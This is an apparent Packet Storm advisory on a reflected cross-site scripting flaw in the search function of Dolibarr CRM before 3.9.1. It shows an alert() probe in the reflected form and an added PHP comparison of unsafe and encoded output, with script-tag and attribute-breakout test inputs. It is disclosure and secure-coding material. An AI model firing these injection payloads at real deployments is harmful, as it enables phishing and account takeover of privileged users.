Dolibarr CRM Cross Site Scripting

Type packetstorm
Reporter David Silveiro
Modified 2016-06-22T00:00:00


# Exploit Title: Dolibarr CRM < 3.9.1 - Reflective XSS Vulnerability  
# Exploit Author: David Silveiro   
# Exploit Author Github:  
# Exploit Author Twitter:   
# Vendor Homepage:  
# Software Link:  
# Date: Zero Day  

Dolibarr ERP is a modern CRM to manage your company. It's open-source software,  
designed for small and medium companies, foundations and freelancers.  

The issue lies with insufficient sanitization when a user makes use of the search  
function provided, making it possible to inject malicious JS to be used in hand with  
a phishing attack directed towards a higher-privileged user.  

<form name="formfilter" action="/societe/list.php" method="post">  
<input type="hidden" value="4a7a89e8a1f2f1fa55a6420ecb115954" name="token"></input>  
<input id="formfilteraction" type="hidden" value="list" name="formfilteraction"></input>  
<input type="hidden" value="s.nom" name="sortfield"></input>  
<input type="hidden" value="ASC" name="sortorder"></input>  
Search criteria '  
alert() <-------  
' into fields Third party name, Alias name, Custom…  
<table class="liste "></table>
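
The reflected "Search criteria '...' into fields ..." banner above is where the search term reaches the page unencoded. As an added example (not Dolibarr's code and not part of the original advisory), the vulnerable output pattern next to a context-encoded one; the function names, the `search_term` parameter name and the field list are hypothetical.

```php
<?php
// Added example, not Dolibarr code. Names below are hypothetical; the message
// mirrors the "Search criteria '...' into fields ..." banner from the advisory.

// Vulnerable pattern: the submitted search term is concatenated into HTML
// as-is, so any markup in the term is parsed by the browser.
function render_banner_unsafe(string $term, array $fields): string
{
    return "<div>Search criteria '" . $term . "' into fields "
         . implode(', ', $fields) . "</div>";
}

// Encode at the point of output. ENT_QUOTES escapes both quote styles, so the
// same helper is safe in element text and in quoted attribute values.
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened banner: every dynamic value passes through h().
function render_banner_safe(string $term, array $fields): string
{
    return "<div>Search criteria '" . h($term) . "' into fields "
         . h(implode(', ', $fields)) . "</div>";
}

// Re-populating the search box is an attribute context; the same encoding
// applies, and the attribute value must stay quoted.
function render_search_input(string $term): string
{
    return '<input type="text" name="search_term" value="' . h($term) . '">';
}

// Constructed input for illustration: the alert() probe from the advisory.
$term   = '<script>alert()</script>';
$fields = ['Third party name', 'Alias name'];

echo render_banner_unsafe($term, $fields), PHP_EOL; // markup reaches the page
echo render_banner_safe($term, $fields), PHP_EOL;   // markup shown as text
echo render_search_input('" autofocus x="'), PHP_EOL; // quotes cannot break out
```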